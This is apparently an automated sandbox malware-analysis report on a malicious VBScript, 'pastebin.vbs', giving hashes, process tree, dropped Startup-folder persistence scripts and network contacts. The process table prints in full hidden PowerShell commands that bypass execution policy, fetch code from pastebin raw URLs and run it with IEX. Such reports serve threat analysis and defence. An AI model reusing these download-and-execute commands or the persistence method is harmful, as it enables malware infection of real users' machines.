File name: | pastebin.vbs |
Full analysis: | https://app.any.run/tasks/ca617851-eb74-47aa-9ff3-bb3ed36afefa |
Verdict: | Malicious activity |
Analysis date: | October 14, 2019, 18:20:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | 783DC5DB24E52BB48A46302D74469076 |
SHA1: | 47A5F6D89CED9DF09DCD8FEFDBAFBBB6099347CB |
SHA256: | 0DDBC93151AD54E112D32A11899A45B0C2E9940DF9B600DD062B7B0815280A34 |
SSDEEP: | 24:/RHRjC+PGnWxLc9WhA9tPNAONAuq3Er5L81WqKj2SVNR5r/81WqKj2Sh8vgpLdx3:/bjbSE6wA9pNAONAu/r5L81WqKSSVT5h |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2092 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\pastebin.vbs" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2132 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DefenderUpdater.vbs" | C:\Windows\System32\WScript.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2336 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbs.vbs" | C:\Windows\System32\WScript.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1244 | "C:\Windows\System32\cmd.exe" /c Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.downloadString('https://pastebin.com/raw/Gs48iS1i'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2748 | Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.downloadString('https://pastebin.com/raw/Gs48iS1i'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3880 | "C:\Windows\System32\cmd.exe" /c Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/5hjnPXNw'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1484 | Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/5hjnPXNw'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2748 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F9BT5KJ8FXI73SBO4E9F.temp | — | |
MD5:— | SHA256:— | |||
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\92PGEG20JI9R3BF0FPY9.temp | — | |
MD5:— | SHA256:— | |||
2092 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DefenderUpdater.vbs | text | |
MD5:BBA0FD8ABE0E9A52A42A932DBFFA0BDF | SHA256:3AAEB3B119D2D9EF0E754AC9A2BB8765ADA19C905564AF875D6E85E703A803F3 | |||
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39afa3.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2748 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39af17.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2748 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2092 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbs.vbs | text | |
MD5:24D9B13BF10CD8CE6464FD7016751AC3 | SHA256:0B1172E7E59545F26BA4158B30ADA1FE3239F622AD116E421029B4714514F6CA | |||
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1484 | powershell.exe | 104.22.3.84:443 | pastebin.com | Cloudflare Inc | US | shared |
2092 | WScript.exe | 163.172.46.38:443 | 1.top4top.net | Online S.a.s. | FR | unknown |
2748 | powershell.exe | 104.22.3.84:443 | pastebin.com | Cloudflare Inc | US | shared |
1484 | powershell.exe | 163.172.58.164:443 | 4.top4top.net | Online S.a.s. | FR | unknown |
2092 | WScript.exe | 163.172.58.164:443 | 4.top4top.net | Online S.a.s. | FR | unknown |
2748 | powershell.exe | 163.172.212.106:443 | 5.top4top.net | Online S.a.s. | NL | unknown |
Domain | IP | Reputation |
---|---|---|
1.top4top.net |
| suspicious |
4.top4top.net |
| suspicious |
pastebin.com |
| shared |
5.top4top.net |
| unknown |